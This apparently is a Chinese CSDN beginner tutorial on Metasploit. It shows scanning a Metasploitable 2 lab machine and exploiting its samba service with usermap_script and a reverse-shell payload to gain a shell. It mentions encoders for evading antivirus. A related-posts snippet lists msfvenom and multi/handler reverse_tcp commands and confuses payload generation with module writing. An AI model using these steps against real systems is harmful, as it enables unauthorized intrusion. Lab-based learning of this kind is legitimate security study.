Metasploit技术初入门01

最新推荐文章于 2022-11-03 10:06:05 发布
最新推荐文章于 2022-11-03 10:06:05 发布
阅读量254 收藏 1
点赞数
分类专栏: Web安全 文章标签: metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wm_nnxx/article/details/106601478
版权

简介和开启

开启命令:msfconsole
开启界面如下:
在这里插入图片描述
MSF框架主要有五个模块组成,分别是
1 辅助模块
2 漏洞利用模块
3 攻击载荷模块
4 后期渗透模块
5 编码工具模块

渗透攻击步骤主要有:
1 扫描目标机系统,寻找可用漏洞
2 选择并配置一个漏洞利用模块
3 选择并配置一个攻击载荷模块
4 选择一个编码技术,用来绕过杀毒软件的查杀
5 渗透攻击

辅助模块的使用

本次使用的被攻击主机是Metasploitable 2,专门实验用的,自己百度装。
渗透测试的第一步是信息收集,所以我们在这里需要做的是主机扫描,主要关注IP地址,开放的服务和端口等。

使用辅助模块进行端口扫描,这里使用search命令搜索端口模块
在这里插入图片描述使用use选择模块,使用 show options查看参数设置,使用set 命令设置参数,run命令开始模块进程
在这里插入图片描述在这里插入图片描述如果发现启动不了,或者没结果等等破问题,重启你们的虚拟机,重启大法好啊!辅助模块种类特别多,多用就知道了,用法都差不多,不会就百度。

也可以用namp来替代辅助模块,直接输入nmap开启就行,然后输入命令nmap -O -Pn/-p0 URL命令 pn和p0就是不适用ping的方式
在这里插入图片描述

漏洞利用模块的使用

nmap查询开放的端口和开启的服务,命令是nmap -sV
在这里插入图片描述我们发现一个叫samba的服务,然后开始寻找对应的漏洞利用模块,命令search samba
在这里插入图片描述发现一个exploit/multi/samba/usermap_script 评价是excellent 而且比较新,就用它了
在这里插入图片描述
可以使用 info exploit/multi/samba/usermap_script 查看它的信息

在这里插入图片描述

使用use exploit/multi/samba/usermap_script 就可以用找个模块了
在这里插入图片描述

使用攻击载荷模块

使用show 命令查看该漏洞利用模块下有哪些攻击载荷模块
在这里插入图片描述根据我们之前nmap得到该系统是linux,所以选择linux对应的模块就行,我们选一个 cmd/unix/reverse,使用set命令选择它,看图 set PAYLOAD cmd/unix/reverse,然后show命令看它的参数
在这里插入图片描述使用set命令设置参数,RHOSET就是被攻击的IP,RPORT就是被攻击的端口,之前nmap扫出来的对应服务端口,相反L开头的就是主动攻击的IP和端口
在这里插入图片描述设置好后 run或者exploit命令开始攻击
在这里插入图片描述然后就得到个shell了

在这里插入图片描述shell已经建立,歇口气,接下来就是后渗透阶段了,这部分就厉害了,下次再说。

梦想成为安全大佬的男人
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[系统安全] 三十七.Metasploit技术之基础用法万字详解及防御机理
杨秀璋的专栏
01-13 3640
系统安全将更好地帮助学者了解病毒逆向分析和系统安全。前文讲解了APT攻击中常用的攻击手段,即PowerShell和PowerSploit脚本攻击,并进一步结合MSF漏洞利用来实现脚本攻击。这篇文章将带领大家了解Metasploit技术,它和CS都是APT攻击中常见的方式,并结合作者之前的漏洞利用及WannaCry逆向经验总结。希望这篇文章对您有帮助!
[网络安全提高篇] 一〇二.Metasploit技术之基础用法万字详解及防御机理
杨秀璋的专栏
02-26 6085
本文是“网络安全提高篇”第二篇文章,将带领大家了解Metasploit技术,并结合作者之前的漏洞利用及WannaCry逆向经验总结。同时本文学习了徐焱老师他们的《Web安全攻防渗透测试实战指南》,在此感谢。具体内容包括:一.Metasploit简介 二.Metasploit基础普及 1.专业术语 2.渗透步骤及攻击链 三.主机扫描 1.使用辅助模块进行端口扫描 2.使用辅助模块进行服务扫描 3.使用Nmap扫描 四.漏洞利用之MS17-010案例 1.背景知识 2.漏洞利用复现 3.防御措施
Metasploit技术
Teemos的博客
09-17 1627
1 metasploit介绍 metasploit框架(Metasploit Framework,MSF)是一个开源工具,旨在方便渗透测试,它是由Ruby程序语言编写的模块化框架,具有很好的扩展性,便于渗透测试人员开发、使用定制的工具模板。 metasploit可向后端模块提供多种用来控制测试的接口(如控制台、web、CLI)。通过控制台接口,还可以访问和使用所有metasploit的插件,例如payload、利用模块、post模块等。此外,metasploit还有第三方程序的接口,如nmap和sqlmap
渗透学习 | Metasploit技术
m_de_g的博客
08-23 304
1.Metasploit简介 Metasploit是当前信息安全与渗透测试领域最流行的术语,它完全颠覆了已有的渗透测试方式。几乎所有流行的操作系统都支持Metasploit,而且Metasploit框架在这些系统上的工作流程基本都一样。 Metasploit框架(Metasploit Framework,MSF)是一个开源工具,旨在方便渗透测试,它是由Ruby程序语言编写的模板化框架,具有很好的扩展性,便于渗透测试人员开发、使用定制的工具模板。 Metasploit可向后端模块提供多种用来控制测试的接口(如
Metasploit技术入门02
WM_NNXX的博客
06-27 256
metasploit的模块主要有五个,辅助模块,漏洞利用模块,攻击载荷模块,后期渗透模块,编码工具模块 在上一篇中我们依次使用了前三个模块,并拿到了一个目标机的shell,接下来就是后期渗透模块的使用了。metasploit主要提供了一个叫meterpreter的后期渗透工具,比较好用。 使用后期渗透模块-工具meterpreter 我们已经得到了一个shell,因为这个shell可能不稳定,所以接下来要迁移这个shell,将它和目标机的一个稳定的进程绑定一起。 首先使用ps命令查看目标机已运行的进程,然后
Web安全攻防-----学习笔记(五)之Metasploit技术
舞指如歌~的博客
09-12 376
第5章 Metasploit技术 apt-get update:只更新软件包的索引源,作用是同步源的软件包的索引信息,从而进行软件更新。 apt-get upgrade:升级系统上安装的所有软件包,若更新失败,所涉及的包会保持更新之前的状态。 apt-get dist-upgrade:升级整个Linux系统。 5.2 Metasploit基础 5.2.1 专业术语 MSF框架由多个模...
metasploit入门用法
06-03
metasploit中exploit模块的使用流程
metasploit入门视频教程
10-09
本视频提供了metasploit的使用的入门教程,有完全的教学视频过程,演示与结果。
信息安全技术Metasploit介绍.pptx
11-01
信息安全技术基础
metasploit
01-02
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序...
metasploit 简介
发哥微课堂
01-03 2985
0x00:简介 metasploit 是一个开源框架,这个框架用来做渗透测试,其 msf 是由多个不同的模块组成的,在使用方面的话,可以在 kali 中直接使用,命令行 msfconsole 即可。 metasploit 会经常更新其中的一些模块和内容,若在 kali 中使用,建议经常更新,命令一般是 apt-get update,apt-get upgrade,apt-get dist-up...
msf使用
温和的跳跃
01-17 271
这个还是要学学,我感觉还可以。工具学学bp sqlmap namp msf应该差不多可以了。这个比其他的几个复杂一些。这篇文章马上安排上
MSF的使用教程
热门推荐
hackzkaq的博客
10-18 3万+
公众号:白帽子左一 MSF简介 MetasploitMSF)是一个免费的、可下载的框架 它本身附带数百个已知软件漏洞,是一款专业级漏洞攻击工具。 当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了,仿佛一夜之间,任何人都可以成为黑客。 因为只要掌握MSF的使用方法,每个人都可以使用MSF来攻击那些未打过补丁或者刚刚打过补丁的漏洞。 也因此软件厂商再也不能推迟发布针对已公布漏洞的补丁了,因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所.
网络安全:MSF常用命令总结
Mr_qing的博客
11-03 1851
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。
msf介绍及其常用模块
bwt_D的博客
03-01 5621
技术功能模块 exploits:利用系统漏洞进行攻击的动作,此模块对应每一个具体漏洞的攻击方法 payload:成功exploit之后,真正在目标系统执行的代码或指令 auxiliary:执行信息收集、枚举、指纹探测、扫描等功能的辅助模块 encoders:对payload进行加密,躲避av检查的模块 nops:提高payload稳定性及维持大小 generate常用选项解释: -b 去掉坏字符,例如:-b ‘\x00\xff’ -e 设置编码方式,可以使用show encoders命令查看所有编码方式 -
MSF笔记(一)
Recar的博客
07-15 4172
这几天又学习了下神器,做了下笔记。Kali linux 下 启动 msfconsole启动数据库 Service postgresql start 查看 Service postgresql statusmsf > service postgressql start [*] exec: service postgressql startHelp帮助创建一个工作台 Workspace
Metasploit 整理笔记
ling_xiao007的专栏
02-21 5680
Metasploit整理笔记
Kali Linux渗透测试——MSF实战篇(一)
Captain_RB的博客
01-07 9713
MSF学习笔记——实战篇(一)MSF学习笔记——实战篇(一)一、信息收集(一)db_nmap(二)Auxiliary模块1.arp扫描2.端口扫描3.空闲扫描4.UDP扫描5.密码嗅探6.SNMP扫描(161端口)6.SMB扫描(445端口)7.SSH扫描(22端口)8.扫描Windows缺少的补丁9.mssql扫描(TCP 1443或者UDP 1434端口)10.ftp扫描(21端口)二、漏洞扫...
Metasploit module开发入门
最新发布
05-25
Metasploit是一款常用的漏洞利用工具,它主要由Ruby编写而成,能够帮助渗透测试人员、安全工程师和攻击者快速发现和利用漏洞。 在Metasploit中,可以通过编写module来扩展其功能。本文将介绍如何开发一个简单的Metasploit模块。 在开始之前,需要安装Metasploit框架。可以在官方网站(https://www.metasploit.com/)上下载并安装。 首先,我们需要创建一个新的模块。在终端中输入以下命令: ``` msfvenom --list payloads ``` 这将列出所有可用的payload。我们将使用其中的“windows/meterpreter/reverse_tcp”,该payload将在远程Windows系统上建立一个反向TCP连接。 接下来,我们需要编写一个模块,该模块将使用我们刚刚生成的payload。打开终端并输入以下命令: ``` msfconsole ``` 这将启动Metasploit控制台。接下来,输入以下命令以创建一个新的模块文件: ``` msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your IP> LPORT=<your port> -f raw -o payload.raw ``` 这将生成一个名为payload.raw的文件,该文件包含我们的payload。接下来,我们需要创建一个新的模块文件并将其命名为“reverse_tcp.rc”: ``` use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST <your IP> set LPORT <your port> set ExitOnSession false exploit -j -z ``` 这个模块使用“exploit/multi/handler”模块来建立一个反向TCP连接。它还使用我们刚刚生成的payload并设置了LHOST和LPORT。最后,它使用“-j”选项运行模块并保持在后台。 现在,我们可以使用以下命令来运行我们的模块: ``` msfconsole -r reverse_tcp.rc ``` 这将启动Metasploit控制台并运行我们的模块。此时,Metasploit将等待远程Windows系统与我们建立反向TCP连接。 以上就是一个简单的Metasploit模块的开发过程,这只是Metasploit模块开发的入门级别。更高级的Metasploit模块可以通过编写Ruby代码来实现更复杂的功能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值